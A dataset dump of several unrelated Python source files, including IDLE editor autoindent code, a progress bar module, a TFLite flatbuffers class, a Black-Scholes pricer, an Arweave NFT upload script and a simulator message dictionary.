if 2 <= i <= 8:
self.indentwidth = i
if self.indentwidth != self.tabwidth:
self.usetabs = False
self.set_tk_tabwidth(self.tabwidth)
def smart_backspace_event(self, event):
text = self.text
first, last = self.get_selection_indices()
if first and last:
text.delete(first, last)
text.mark_set("insert", first)
return "break"
# Delete whitespace left, until hitting a real char or closest
# preceding virtual tab stop.
chars = text.get("insert linestart", "insert")
if chars == '':
if text.compare("insert", ">", "1.0"):
# easy: delete preceding newline
text.delete("insert-1c")
else:
text.bell() # at start of buffer
return "break"
if chars[-1] not in " \t":
# easy: delete preceding real char
text.delete("insert-1c")
return "break"
# Ick. It may require *inserting* spaces if we back up over a
# tab character! This is written to be clear, not fast.
tabwidth = self.tabwidth
have = len(chars.expandtabs(tabwidth))
assert have > 0
want = ((have - 1) // self.indentwidth) * self.indentwidth
# Debug prompt is multilined....
ncharsdeleted = 0
while 1:
if chars == self.prompt_last_line: # '' unless PyShell
break
chars = chars[:-1]
ncharsdeleted = ncharsdeleted + 1
have = len(chars.expandtabs(tabwidth))
if have <= want or chars[-1] not in " \t":
break
text.undo_block_start()
text.delete("insert-%dc" % ncharsdeleted, "insert")
if have < want:
text.insert("insert", ' ' * (want - have))
text.undo_block_stop()
return "break"
def smart_indent_event(self, event):
# if intraline selection:
# delete it
# elif multiline selection:
# do indent-region
# else:
# indent one level
text = self.text
first, last = self.get_selection_indices()
text.undo_block_start()
try:
if first and last:
if index2line(first) != index2line(last):
return self.indent_region_event(event)
text.delete(first, last)
text.mark_set("insert", first)
prefix = text.get("insert linestart", "insert")
raw, effective = classifyws(prefix, self.tabwidth)
if raw == len(prefix):
# only whitespace to the left
self.reindent_to(effective + self.indentwidth)
else:
# tab to the next 'stop' within or to right of line's text:
if self.usetabs:
pad = '\t'
else:
effective = len(prefix.expandtabs(self.tabwidth))
n = self.indentwidth
pad = ' ' * (n - effective % n)
text.insert("insert", pad)
text.see("insert")
return "break"
finally:
text.undo_block_stop()
def newline_and_indent_event(self, event):
text = self.text
first, last = self.get_selection_indices()
text.undo_block_start()
try:
if first and last:
text.delete(first, last)
text.mark_set("insert", first)
line = text.get("insert linestart", "insert")
i, n = 0, len(line)
while i < n and line[i] in " \t":
i = i+1
if i == n:
# the cursor is in or at leading indentation in a continuation
# line; just inject an empty line at the start
text.insert("insert linestart", '\n')
return "break"
indent = line[:i]
# strip whitespace before insert point unless it's in the prompt
i = 0
while line and line[-1] in " \t" and line != self.prompt_last_line:
line = line[:-1]
i = i+1
if i:
text.delete("insert - %d chars" % i, "insert")
# strip whitespace after insert point
while text.get("insert") in " \t":
text.delete("insert")
# start new line
text.insert("insert", '\n')
# adjust indentation for continuations and block
# open/close first need to find the last stmt
lno = index2line(text.index('insert'))
y = pyparse.Parser(self.indentwidth, self.tabwidth)
if not self.context_use_ps1:
for context in self.num_context_lines:
startat = max(lno - context, 1)
startatindex = repr(startat) + ".0"
rawtext = text.get(startatindex, "insert")
y.set_code(rawtext)
bod = y.find_good_parse_start(
self.context_use_ps1,
self._build_char_in_string_func(startatindex))
if bod is not None or startat == 1:
break
y.set_lo(bod or 0)
else:
r = text.tag_prevrange("console", "insert")
if r:
startatindex = r[1]
else:
startatindex = "1.0"
rawtext = text.get(startatindex, "insert")
y.set_code(rawtext)
y.set_lo(0)
c = y.get_continuation_type()
if c != pyparse.C_NONE:
# The current stmt hasn't ended yet.
if c == pyparse.C_STRING_FIRST_LINE:
# after the first line of a string; do not indent at all
pass
elif c == pyparse.C_STRING_NEXT_LINES:
# inside a string which started before this line;
# just mimic the current indent
text.insert("insert", indent)
elif c == pyparse.C_BRACKET:
# line up with the first (if any) element of the
# last open bracket structure; else indent one
# level beyond the indent of the line with the
# last open bracket
self.reindent_to(y.compute_bracket_indent())
elif c == pyparse.C_BACKSLASH:
# if more than one line in this stmt already, just
# mimic the current indent; else if initial line
# has a start on an assignment stmt, indent to
# beyond leftmost =; else to beyond first chunk of
# non-whitespace on initial line
if y.get_num_lines_in_stmt() > 1:
text.insert("insert", indent)
else:
self.reindent_to(y.compute_backslash_indent())
else:
assert 0, "bogus continuation type %r" % (c,)
return "break"
# This line starts a brand new stmt; indent relative to
# indentation of initial line of closest preceding
# interesting stmt.
indent = y.get_base_indent_string()
text.insert("insert", indent)
if y.is_block_opener():
self.smart_indent_event(event)
elif indent and y.is_block_closer():
self.smart_backspace_event(event)
return "break"
finally:
text.see("insert")
text.undo_block_stop()
# Our editwin provides an is_char_in_string function that works
# with a Tk text index, but PyParse only knows about offsets into
# a string. This builds a function for PyParse that accepts an
# offset.
def _build_char_in_string_func(self, startindex):
def inner(offset, _startindex=startindex,
_icis=self.is_char_in_string):
return _icis(_startindex + "+%dc" % offset)
return inner
def indent_region_event(self, event):
head, tail, chars, lines = self.get_region()
for pos in range(len(lines)):
line = lines[pos]
if line:
raw, effective = classifyws(line, self.tabwidth)
effective = effective + self.indentwidth
lines[pos] = self._make_blanks(effective) + line[raw:]
self.set_region(head, tail, chars, lines)
return "break"
def dedent_region_event(self, event):
head, tail, chars, lines = self.get_region()
for pos in range(len(lines)):
line = lines[pos]
if line:
raw, effective = classifyws(line, self.tabwidth)
effective = max(effective - self.indentwidth, 0)
lines[pos] = self._make_blanks(effective) + line[raw:]
self.set_region(head, tail, chars, lines)
return "break"
def comment_region_event(self, event):
head, tail, chars, lines = self.get_region()
for pos in range(len(lines) - 1):
line = lines[pos]
lines[pos] = '##' + line
self.set_region(head, tail, chars, lines)
return "break"
def uncomment_region_event(self, event):
head, tail, chars, lines = self.get_region()
for pos in range(len(lines)):
line = lines[pos]
if not line:
continue
if line[:2] == '##':
line = line[2:]
elif line[:1] == '#':
line = line[1:]
lines[pos] = line
self.set_region(head, tail, chars, lines)
return "break"
def tabify_region_event(self, event):
head, tail, chars, lines = self.get_region()
tabwidth = self._asktabwidth()
if tabwidth is None: return
for pos in range(len(lines)):
line = lines[pos]
if line:
raw, effective = classifyws(line, tabwidth)
ntabs, nspaces = divmod(effective, tabwidth)
lines[pos] = '\t' * ntabs + ' ' * nspaces + line[raw:]
self.set_region(head, tail, chars, lines)
return "break"
def untabify_region_event(self, event):
head, tail, chars, lines = self.get_region()
tabwidth = self._asktabwidth()
if tabwidth is None: return
for pos in range(len(lines)):
lines[pos] = lines[pos].expandtabs(tabwidth)
self.set_region(head, tail, chars, lines)
return "break"
def toggle_tabs_event(self, event):
if self.askyesno(
"Toggle tabs",
"Turn tabs " + ("on", "off")[self.usetabs] +
"?\nIndent width " +
("will be", "remains at")[self.usetabs] + " 8." +
"\n Note: a tab is always 8 columns",
parent=self.text):
self.usetabs = not self.usetabs
# Try to prevent inconsistent indentation.
# User must change indent width manually after using tabs.
self.indentwidth = 8
return "break"
# XXX this isn't bound to anything -- see tabwidth comments
## def change_tabwidth_event(self, event):
## new = self._asktabwidth()
## if new != self.tabwidth:
## self.tabwidth = new
## self.set_indentation_params(0, guess=0)
## return "break"
def change_indentwidth_event(self, event):
new = self.askinteger(
"Indent width",
"New indent width (2-16)\n(Always use 8 when using tabs)",
parent=self.text,
initialvalue=self.indentwidth,
minvalue=2,
maxvalue=16)
if new and new != self.indentwidth and not self.usetabs:
self.indentwidth = new
return "break"
def get_region(self):
text = self.text
first, last = self.get_selection_indices()
if first and last:
head = text.index(first + " linestart")
tail = text.index(last + "-1c lineend +1c")
else:
head = text.index("insert linestart")
tail = text.index("insert lineend +1c")
chars = text.get(head, tail)
lines = chars.split("\n")
return head, tail, chars, lines
def set_region(self, head, tail, chars, lines):
text = self.text
newchars = "\n".join(lines)
if newchars == chars:
text.bell()
return
text.tag_remove("sel", "1.0", "end")
text.mark_set("insert", head)
text.undo_block_start()
text.delete(head, tail)
text.insert(head, newchars)
text.undo_block_stop()
text.tag_add("sel", head, "insert")
# Make string that displays as n leading blanks.
def _make_blanks(self, n):
if self.usetabs:
ntabs, nspaces = divmod(n, self.tabwidth)
return '\t' * ntabs + ' ' * nspaces
else:
return ' ' * n
# Delete from beginning of line to insert point, then reinsert
# column logical (meaning use tabs if appropriate) spaces.
def reindent_to(self, column):
text = self.text
text.undo_block_start()
if text.compare("insert linestart", "!=", "insert"):
text.delete("insert linestart", "insert")
if column:
text.insert("insert", self._make_blanks(column))
text.undo_block_stop()
def _asktabwidth(self):
return self.askinteger(
"Tab width",
"Columns per tab? (2-16)",
parent=self.text,
initialvalue=self.indentwidth,
minvalue=2,
maxvalue=16)
# Guess indentwidth from text content.
# Return guessed indentwidth. This should not be believed unless
# it's in a reasonable range (e.g., it will be 0 if no indented
# blocks are found).
def guess_indent(self):
opener, indented = IndentSearcher(self.text, self.tabwidth).run()
if opener and indented:
raw, indentsmall = classifyws(opener, self.tabwidth)
raw, indentlarge = classifyws(indented, self.tabwidth)
else:
indentsmall = indentlarge = 0
return indentlarge - indentsmall
# "line.col" -> line, as an int
def index2line(index):
return int(float(index))
# Look at the leading whitespace in s.
# Return pair (# of leading ws characters,
# effective # of leading blanks after expanding
# tabs to width tabwidth)
def classifyws(s, tabwidth):
raw = effective = 0
for ch in s:
if ch == ' ':
raw = raw + 1
effective = effective + 1
elif ch == '\t':
raw = raw + 1
effective = (effective // tabwidth + 1) * tabwidth
else:
break
return raw, effective
class IndentSearcher(object):
# .run() chews over the Text widget, looking for a block opener
# and the stmt following it. Returns a pair,
# (line containing block opener, line containing stmt)
# Either or both may be None.
def __init__(self, text, tabwidth):
self.text = text
self.tabwidth = tabwidth
self.i = self.finished = 0
self.blkopenline = self.indentedline = None
def readline(self):
if self.finished:
return ""
i = self.i = self.i + 1
mark = repr(i) + ".0"
if self.text.compare(mark, ">=", "end"):
return ""
return self.text.get(mark, mark + " lineend+1c")
def tokeneater(self, type, token, start, end, line,
INDENT=tokenize.INDENT,
NAME=tokenize.NAME,
OPENERS=('class', 'def', 'for', 'if', 'try', 'while')):
if self.finished:
pass
elif type == NAME and token in OPENERS:
self.blkopenline = line
elif type == INDENT and self.blkopenline:
self.indentedline = line
self.finished = 1
def run(self):
save_tabsize = tokenize.tabsize
tokenize.tabsize = self.tabwidth
try:
try:
tokens = tokenize.generate_tokens(self.readline)
for token in tokens:
self.tokeneater(*token)
except (tokenize.TokenError, SyntaxError):
# since we cut off the tokenizer early, we can trigger
# spurious errors
pass
finally:
tokenize.tabsize = save_tabsize
return self.blkopenline, self.indentedline
### end autoindent code ###
def prepstr(s):
# Helper to extract the underscore from a string, e.g.
# prepstr("Co_py") returns (2, "Copy").
i = s.find('_')
if i >= 0:
s = s[:i] + s[i+1:]
return i, s
keynames = {
'bracketleft': '[',
'bracketright': ']',
'slash': '/',
}
def get_accelerator(keydefs, eventname):
keylist = keydefs.get(eventname)
# issue10940: temporary workaround to prevent hang with OS X Cocoa Tk 8.5
# if not keylist:
if (not keylist) or (macosx.isCocoaTk() and eventname in {
"<<open-module>>",
"<<goto-line>>",
"<<change-indentwidth>>"}):
return ""
s = keylist[0]
s = re.sub(r"-[a-z]\b", lambda m: m.group().upper(), s)
s = re.sub(r"\b\w+\b", lambda m: keynames.get(m.group(), m.group()), s)
s = re.sub("Key-", "", s)
s = re.sub("Cancel","Ctrl-Break",s) # dscherer@cmu.edu
s = re.sub("Control-", "Ctrl-", s)
s = re.sub("-", "+", s)
s = re.sub("><", " ", s)
s = re.sub("<", "", s)
s = re.sub(">", "", s)
return s
def fixwordbreaks(root):
# On Windows, tcl/tk breaks 'words' only on spaces, as in Command Prompt.
# We want Motif style everywhere. See #21474, msg218992 and followup.
tk = root.tk
tk.call('tcl_wordBreakAfter', 'a b', 0) # make sure word.tcl is loaded
tk.call('set', 'tcl_wordchars', r'\w')
tk.call('set', 'tcl_nonwordchars', r'\W')
def _editor_window(parent): # htest #
# error if close master window first - timer event, after script
root = parent
fixwordbreaks(root)
if sys.argv[1:]:
filename = sys.argv[1]
else:
filename = None
macosx.setupApp(root, None)
edit = EditorWindow(root=root, filename=filename)
text = edit.text
text['height'] = 10
for i in range(20):
text.insert('insert', ' '*i + str(i) + '\n')
# text.bind("<<close-all-windows>>", edit.close_event)
# Does not stop error, neither does following
# edit.text.bind("<<close-window>>", edit.close_event)
if __name__ == '__main__':
from unittest import main
main('idlelib.idle_test.test_editor', verbosity=2, exit=False)
from idlelib.idle_test.htest import run
run(_editor_window)
| 38.970622 | 95 | 0.568903 |
276666bce4fa21c7f07262b79b6a8c874f49d7c5 | 4,915 | py | Python | src/flashkit/core/progress.py | akashdhruv/FlashKit | dac777c52795098b75ab4875440d232efa1b0973 | [
"MIT"
] | 2 | 2022-02-01T02:41:24.000Z | 2022-02-11T20:58:03.000Z | src/flashkit/core/progress.py | akashdhruv/FlashKit | dac777c52795098b75ab4875440d232efa1b0973 | [
"MIT"
] | 39 | 2021-06-07T04:08:54.000Z | 2022-01-14T14:50:52.000Z | src/flashkit/core/progress.py | akashdhruv/FlashKit | dac777c52795098b75ab4875440d232efa1b0973 | [
"MIT"
] | 1 | 2022-02-11T20:58:20.000Z | 2022-02-11T20:58:20.000Z | """Povides progress bar support for FlashKit library."""
# type annotations
from __future__ import annotations
from typing import TYPE_CHECKING
# standard libraries
import logging
import pkg_resources
import threading
import time
import sys
from contextlib import AbstractContextManager, nullcontext
# internal libraries
from .parallel import is_parallel
from ..resources import CONFIG
# static analysis
if TYPE_CHECKING:
from typing import Any, Callable, Optional, Union
Bar = Callable[..., AbstractContextManager]
# deal w/ runtime import
else:
Bar = None
logger = logging.getLogger(__name__)
# define public interface
__all__ = ['SimpleBar', 'get_bar', 'null_bar', 'attach_context', ]
# define default constants
BLANKING = CONFIG['core']['progress']['blanking']
CYCLINGS = CONFIG['core']['progress']['cyclings']
ENTRANCE = CONFIG['core']['progress']['entrance']
PROGRESS = CONFIG['core']['progress']['progress']
SENTINAL = CONFIG['core']['progress']['sentinal']
TERMINAL = CONFIG['core']['progress']['terminal']
UPDATING = CONFIG['core']['progress']['updating']
def null_bar(*_) -> AbstractContextManager:
"""Default context manager for progress bar."""
return nullcontext(lambda *_: None)
def set_message(message: str) -> None:
"""Provides a message capability to the progress bar."""
SimpleBar.message = message
class SimpleBar(threading.Thread):
"""Implements a simple, threaded, context manager for a progress bar."""
progress: int = PROGRESS
terminal: int = TERMINAL
sentinal: str = SENTINAL
blanking: str = BLANKING
entrance: str = ENTRANCE
cyclings: float = CYCLINGS
message: str = ''
def __enter__(self) -> Callable[[], None]:
self.start()
return self.update
def __exit__(self, *args, **kwargs) -> None:
self.calculate()
self.flush(self.final())
self.stop_event.set()
def __init__(self, total: Optional[int] = None, *, fps: float = UPDATING):
threading.Thread.__init__(self, name='Progress')
self.stop_event = threading.Event()
self.sleep = 1.0 / fps
if total is not None:
self.known = True
self.total = total
else:
self.known = False
self.total = 1
self.write = self.write_known if self.known else self.write_unknown
self.final = self.final_known if self.known else self.final_unknown
self.clock = time.time()
self.click = 0
def calculate(self) -> None:
self.last = time.time() - self.clock
self.rate = self.click / self.last if self.last > 1.0 else 0.0
self.frac = self.click / self.total * 100
if self.known:
done = int(min(1, self.click / self.total) * self.progress)
else:
done = int((self.last % self.cyclings) / self.cyclings * self.progress)
self.done = self.sentinal * done
self.left = self.blanking * (self.progress - done)
def final_known(self) -> str:
return f'{self.entrance}|{self.done}| {self.click}/{self.total} [{100.0:.0f}%] in {self.last:.1f}s ({self.rate:.2f}/s)\n'
def final_unknown(self) -> str:
done = self.sentinal * self.progress
return f'{self.entrance}|{done}| {self.click} in {self.last:.1f}s ({self.rate:.2f}/s)\n'
def flush(self, message: str) -> None:
print(message.ljust(self.terminal), end='\r')
def update(self) -> None:
self.click += 1
update.text = set_message # type: ignore
def run(self) -> None:
while not self.stop_event.is_set():
time.sleep(self.sleep)
self.calculate()
self.flush(self.write())
def write_known(self) -> str:
return f'{self.entrance}|{self.done}{self.left}| {self.click}/{self.total} [{self.frac:.0f}%] in {self.last:.1f}s ({self.rate:.2f}/s) {self.message}'
def write_unknown(self) -> str:
return f'{self.entrance}|{self.done}{self.left}| {self.click} in {self.last:.1f}s ({self.rate:.2f}/s) {self.message}'
def get_bar(*, null: bool = False) -> Bar:
"""Retrives the best supported progress bar at runtime."""
if null: return null_bar #NULL_BAR
if is_parallel(): return SimpleBar
try:
pkg_resources.get_distribution('alive_progress')
from alive_progress import alive_bar, config_handler # type: ignore
config_handler.set_global(theme='smooth', unknown='horizontal')
return alive_bar
except pkg_resources.DistributionNotFound:
return SimpleBar
def attach_context(**args: Any) -> dict[str, Any]:
"""Provide a usefull progress bar if appropriate; with throw if some defaults missing."""
noattach = not sys.stdout.isatty()
args['context'] = get_bar(null=noattach)
if not noattach: logger.debug(f'api -- Attached a dynamic progress context')
return args
| 34.858156 | 157 | 0.646796 |
a022e1cf1b3cb88c4e83909831891354185952da | 196 | py | Python | washing_learning/vision/__init__.py | Lucas-rbnt/washing-learning | eb3e8bcc7c58dafc19bfb94779c681c1164524e7 | [
"MIT"
] | 8 | 2021-04-13T09:12:38.000Z | 2021-11-02T08:50:29.000Z | washing_learning/vision/__init__.py | Lucas-rbnt/washing-learning | eb3e8bcc7c58dafc19bfb94779c681c1164524e7 | [
"MIT"
] | null | null | null | washing_learning/vision/__init__.py | Lucas-rbnt/washing-learning | eb3e8bcc7c58dafc19bfb94779c681c1164524e7 | [
"MIT"
] | null | null | null | """
This API implements the classes and functions to avoid having to do boilerplate code and simplify the code by making it
higher-level. This module focuses solely on Computer Vision issues.
"""
| 39.2 | 119 | 0.790816 |
9548cfaffaf3d5f4342233503cea008afb609add | 1,427 | py | Python | option_pricer/black_scholes.py | tsengkasing/option-pricer | 89fff55070834698d801f3a6eb10e16d40fc7762 | [
"MIT"
] | null | null | null | option_pricer/black_scholes.py | tsengkasing/option-pricer | 89fff55070834698d801f3a6eb10e16d40fc7762 | [
"MIT"
] | null | null | null | option_pricer/black_scholes.py | tsengkasing/option-pricer | 89fff55070834698d801f3a6eb10e16d40fc7762 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from math import log, sqrt, e
import scipy.stats as si
def black_scholes(option_type, S, K, T, sigma, r, q):
"""Calculate Black-Scholes Formulas
:param option_type: string, 'call' | 'put'.
:param S: int, spot price.
:param K: int, strike price.
:param T: float, time to maturity, in year.
:param sigma: float, volatility of underlying asset.
:param r: float, risk-free interest rate.
:param q: float, repo rate.
Returns:
values of either call and put options.
"""
d1 = (log(S / K) + (r - q) * T) / (sigma * sqrt(T)) + 0.5 * sigma * sqrt(T)
d2 = (log(S / K) + (r - q) * T) / (sigma * sqrt(T)) - 0.5 * sigma * sqrt(T)
if option_type == 'call':
return S * (e ** (-q * T)) * si.norm.cdf(d1, 0.0, 1.0) - K * (e ** (-r * T)) * si.norm.cdf(d2, 0.0, 1.0)
elif option_type == 'put':
return K * (e ** (-r * T)) * si.norm.cdf(-d2, 0.0, 1.0) - S * (e ** (-q * T)) * si.norm.cdf(-d1, 0.0, 1.0)
else:
raise Exception('Error Option Type')
# For testing
if __name__ == '__main__':
call_option = black_scholes(option_type='call', S=100, K=100, T=0.5, sigma=0.2, r=0.01, q=0.2)
put_option = black_scholes(option_type='put', S=100, K=100, T=0.5, sigma=0.2, r=0.01, q=0.2)
print("S=100, K=100, t=0, T=0.5, sigma=0.2, r=0.01, q=0.5 => Call [{}], Put [{}]".format(call_option, put_option))
| 37.552632 | 118 | 0.562018 |
d29723c3ea6e4036936f1deea104a22b602f7c21 | 977 | py | Python | util/third_party/tensorflow_extra/tool/tflite/tflite/NonMaxSuppressionV5Options.py | PascalGuenther/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | [
"Zlib"
] | 82 | 2016-06-29T17:24:43.000Z | 2021-04-16T06:49:17.000Z | util/third_party/tensorflow_extra/tool/tflite/tflite/NonMaxSuppressionV5Options.py | PascalGuenther/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | [
"Zlib"
] | 6 | 2022-01-12T18:22:08.000Z | 2022-03-25T10:19:27.000Z | util/third_party/tensorflow_extra/tool/tflite/tflite/NonMaxSuppressionV5Options.py | PascalGuenther/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | [
"Zlib"
] | 56 | 2016-08-02T10:50:50.000Z | 2021-07-19T08:57:34.000Z | # automatically generated by the FlatBuffers compiler, do not modify
# namespace: tflite
import flatbuffers
from flatbuffers.compat import import_numpy
np = import_numpy()
class NonMaxSuppressionV5Options(object):
__slots__ = ['_tab']
@classmethod
def GetRootAsNonMaxSuppressionV5Options(cls, buf, offset=0):
n = flatbuffers.encode.Get(flatbuffers.packer.uoffset, buf, offset)
x = NonMaxSuppressionV5Options()
x.Init(buf, n + offset)
return x
@classmethod
def NonMaxSuppressionV5OptionsBufferHasIdentifier(cls, buf, offset, size_prefixed=False):
return flatbuffers.util.BufferHasIdentifier(buf, offset, b"\x54\x46\x4C\x33", size_prefixed=size_prefixed)
# NonMaxSuppressionV5Options
def Init(self, buf, pos):
self._tab = flatbuffers.table.Table(buf, pos)
def NonMaxSuppressionV5OptionsStart(builder): builder.StartObject(0)
def NonMaxSuppressionV5OptionsEnd(builder): return builder.EndObject()
| 33.689655 | 114 | 0.750256 |
6e463ce950c5ab89f5ca899c3ccb55194594d239 | 9,277 | py | Python | arweave_nft_uploader/__init__.py | KultureElectric/arweave-nft-uploader | 3b79229cb42d2c8d2f010bf7fa042a14ae05ebb9 | [
"MIT"
] | 1 | 2021-12-17T22:34:30.000Z | 2021-12-17T22:34:30.000Z | arweave_nft_uploader/__init__.py | KultureElectric/arweave-nft-uploader-dynamicNFTs-patch | 3b79229cb42d2c8d2f010bf7fa042a14ae05ebb9 | [
"MIT"
] | null | null | null | arweave_nft_uploader/__init__.py | KultureElectric/arweave-nft-uploader-dynamicNFTs-patch | 3b79229cb42d2c8d2f010bf7fa042a14ae05ebb9 | [
"MIT"
] | null | null | null | import argparse
import json
import logging
from arweave import Wallet, Transaction
from arweave.transaction_uploader import get_uploader
import os
import sys
import glob
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-e', '--env', default='devnet', help='Solana cluster env name (default: "devnet")')
parser.add_argument('-k', '--keypair', help='Arweave wallet location (default: "--keypair not provided")')
parser.add_argument('-v', '--verbose', action='count', default=0, help='increase output verbosity')
parser.add_argument('-c', '--cache-name', default='temp', help='Cache file name (default: "temp")')
parser.add_argument('--force-upload', action='store_true',
help='Force upload all assets, even the ones that have already been uploaded')
parser.add_argument('--assets-from-json', action='store_true',
help='If this flag is specified, assets file names are read from properties.files.uri/type'
' (e.g. for uploading both png and svg), instead of the default pair NNN.json/NNN.png')
parser.add_argument('directory', help='Directory containing images named from 0-n')
args = parser.parse_args()
levels = [logging.INFO, logging.DEBUG]
level = levels[min(len(levels) - 1, args.verbose)] # capped to number of levels
logging.basicConfig(level=level, format="%(levelname)s %(message)s")
# Enumerate assets
try:
jsonfiles_raw = glob.glob(os.path.join(args.directory, "*.json"))
jsonfiles = []
for jsonfile in jsonfiles_raw:
# Filename without extension is the cache item
cache_item, tmp = os.path.splitext(os.path.basename(jsonfile))
if cache_item.isdigit():
jsonfiles.append(jsonfile)
else:
logging.warning("Json file: " + str(jsonfile) + " is not in the format <number>.json, skipping")
except Exception as ex:
logging.error(ex)
logging.error("Can't enumerate assets in directory: " + str(args.directory))
sys.exit(1)
# Load cache file
cache_filename = ""
try:
cache_filename = os.path.join('.cache', args.env + "-" + args.cache_name + '.json')
with open(cache_filename, 'r') as f:
cache_data = json.load(f)
except Exception as ex:
cache_data = {}
if "program" not in cache_data or "items" not in cache_data or "0" not in cache_data["items"]:
logging.error("")
logging.error("Cache file " + str(cache_filename) + " is not initialized with a candy machine program")
logging.error("")
logging.error("You must initialize the candy machine program with a single 0.json and 0.png file,")
logging.error("specifying the total number of NFTs with the -n option, like this:")
logging.error("")
logging.error("ts-node ~/metaplex-foundation/metaplex/js/packages/cli/src/candy-machine-cli.ts"
" upload <single asset dir> -n {} --keypair <keypair file> --env <env name>".format(
len(jsonfiles)))
logging.error("")
logging.error("*** It is VERY important that <single asset dir> ONLY contains 0.json and 0.png ***")
logging.error("*** to avoid uploading all the assets with candy-machine-cli.ts ***")
sys.exit(1)
# Load arweave wallet
try:
wallet = Wallet(args.keypair)
logging.info("Initial Arweave wallet balance: {}".format(wallet.balance))
except Exception as ex:
logging.error(ex)
logging.error("Can't load Arweave wallet: " + str(args.keypair))
sys.exit(1)
# Upload assets
num_upload_errors = 0
logging.info("Starting the upload for {} assets".format(len(jsonfiles)))
for idx, jsonfile in enumerate(jsonfiles):
# Filename without extension is the cache item
cache_item, tmp = os.path.splitext(os.path.basename(jsonfile))
if not cache_item.isdigit():
logging.warning("Json file: " + str(jsonfile) + " is not in the format <number>.json, skipping")
continue
# Check if the asset is already in cache and already uploaded, unless --force-upload flag is specified
if not args.force_upload:
if cache_item in cache_data["items"] and "uploadedToArweave" in cache_data["items"][cache_item] \
and cache_data["items"][cache_item]["uploadedToArweave"]:
logging.debug("Skipping already uploaded file: " + str(jsonfile))
continue
# Load json file
msg = "Processing file: {}".format(idx)
if idx % 50 == 0:
logging.info(msg)
else:
logging.debug(msg)
try:
with open(jsonfile, 'r') as f:
asset_data = json.load(f)
except Exception as ex:
logging.error(ex)
logging.error("Can't load json file: " + str(jsonfile)) + ", skipping"
num_upload_errors += 1
continue
# Get asset name
try:
asset_name = asset_data["name"]
except Exception as ex:
logging.error(ex)
logging.error("Json file: " + str(jsonfile)) + " has no name, skipping"
num_upload_errors += 1
continue
# Locate asset files
asset_files = []
try:
if args.assets_from_json:
files = asset_data["properties"]["files"]
for idx2, tmp in enumerate(asset_data["properties"]["files"]):
asset_file = os.path.join(args.directory, files[idx2]["uri"])
if os.path.isfile(asset_file):
asset_files.append({"file": asset_file, "type": files[idx2]["type"], "idx": idx2})
else:
raise Exception("Can't find asset file: " + str(asset_file))
else:
asset_file = jsonfile.replace(".json", ".html")
if os.path.isfile(asset_file):
asset_files = [{"file": asset_file, "type": "text/html", "idx": 0}]
else:
raise Exception("Can't find asset file: " + str(asset_file))
asset_data["properties"]["files"] = [{"uri": "", "type": "text/html"}]
except Exception as ex:
logging.error(ex)
logging.error("Can't find all assets for json file: " + str(jsonfile) + ", skipping")
num_upload_errors += 1
continue
try:
# Upload asset files
has_asset_image = False
for asset in asset_files:
asset_filename, asset_fileext = os.path.splitext(asset["file"])
asset_fileext = asset_fileext.lstrip(".")
with open(asset["file"], 'rb', buffering=0) as file_handler:
tx = Transaction(wallet, file_handler=file_handler, file_path=asset["file"])
tx.add_tag('Content-Type', asset["type"])
tx.sign()
uploader = get_uploader(tx, file_handler)
while not uploader.is_complete:
uploader.upload_chunk()
txdict = tx.to_dict()
uri = "https://arweave.net/{}?ext={}".format(txdict["id"], asset_fileext)
asset_data["properties"]["files"][asset["idx"]]["uri"] = uri
if not has_asset_image and asset_fileext == "html":
has_asset_image = True
asset_data["image"] = uri
asset_data["animation_url"] = uri
if not has_asset_image:
logging.error("At least one png image is required for json file: " + str(jsonfile) + ", skipping")
num_upload_errors += 1
continue
# Upload metadata
tx = Transaction(wallet, data=json.dumps(asset_data))
tx.add_tag('Content-Type', "application/json")
tx.sign()
tx.send()
txdict = tx.to_dict()
uri = "https://arweave.net/{}".format(txdict["id"])
cache_data["items"][cache_item] = {"link": uri,
"name": asset_name,
"onChain": False,
"uploadedToArweave": True}
with open(cache_filename, 'w') as f:
json.dump(cache_data, f)
except Exception as ex:
logging.error(ex)
logging.error("Can't upload assets for json file: " + str(jsonfile) + ", skipping")
num_upload_errors += 1
continue
logging.info("")
logging.info("Ending Arweave wallet balance: {}".format(wallet.balance))
if num_upload_errors > 0:
logging.warning("There have been {} upload errors. "
"Please review them and retry the upload with the same command".format(num_upload_errors))
else:
logging.info("Upload complete! Now you can update the index with 'candy-machine-cli.ts upload'"
" using the full assets directory (see documentation)")
| 48.067358 | 116 | 0.572707 |
e19c19635ca289b81694000e80c426260fd170ad | 14,658 | py | Python | sim21/solver/langs/English.py | kpatvt/sim21 | 4cbbfcbef6371d3dc5404429545e003a48c69ba5 | [
"Artistic-2.0"
] | 7 | 2021-08-23T18:46:27.000Z | 2022-01-26T07:10:22.000Z | sim21/solver/langs/English.py | kpatvt/sim21 | 4cbbfcbef6371d3dc5404429545e003a48c69ba5 | [
"Artistic-2.0"
] | null | null | null | sim21/solver/langs/English.py | kpatvt/sim21 | 4cbbfcbef6371d3dc5404429545e003a48c69ba5 | [
"Artistic-2.0"
] | null | null | null | def Messages():
"""create dictionary of English messages"""
m = {'AddCompoundError': "Thermo provider reports the following error when adding compound:\n%s",
'AdjustingFromOlderVersion': "Recalling case created in an older version. Updating from: FlowsheetVersion = "
"%d; ReleaseVersion = %s. To: FlowsheetVersion %d; ReleaseVersion %s",
'AfterPortDisconnect': "%s disconnected from %s",
'BalanceInvalidPort': "Invalid port for balance (not material or energy)",
'BeforePortDisconnect': "Disconnecting %s from %s",
'BubbleTCouldNotCalc': "Bubble Point temperature could not be calculated in %s at P = %s kPa and composition "
"= %s",
'CalcDisturbance': "Calculating disturbance %i of %i in jacobian of %s",
'CalculatingProfile': "Calculating profile in %s. Segment %i. Properties %s",
'CalculatingStep': "Calculating step %i in %s. Currently in %g. Going from %g to %g",
'CantAddObject': "Can't add %s to %s", 'CantAddToStage': "Can't add %s to stage %d of %s",
'CantAddToStageObject': "Can't add %s to %s on stage %d of %s", 'CantChangeName': "Can't change name of %s",
'CantCloneFlowsheet': "Can't clone flowsheet %s if stacks are not empty (solve, forget, unconverged "
"recycles, consistency errors)",
'CantCreateSpec': "Can't create spec %s. It is probably not supported",
'CantDeleteFromStage': "Can't delete %s from stage %d of %s",
'CantDeleteObject': "Can't delete object %s. Unit op can not solve with out it",
'CantDelPortDirectly': "Can't delete port %s from %s. Delete associated object instead",
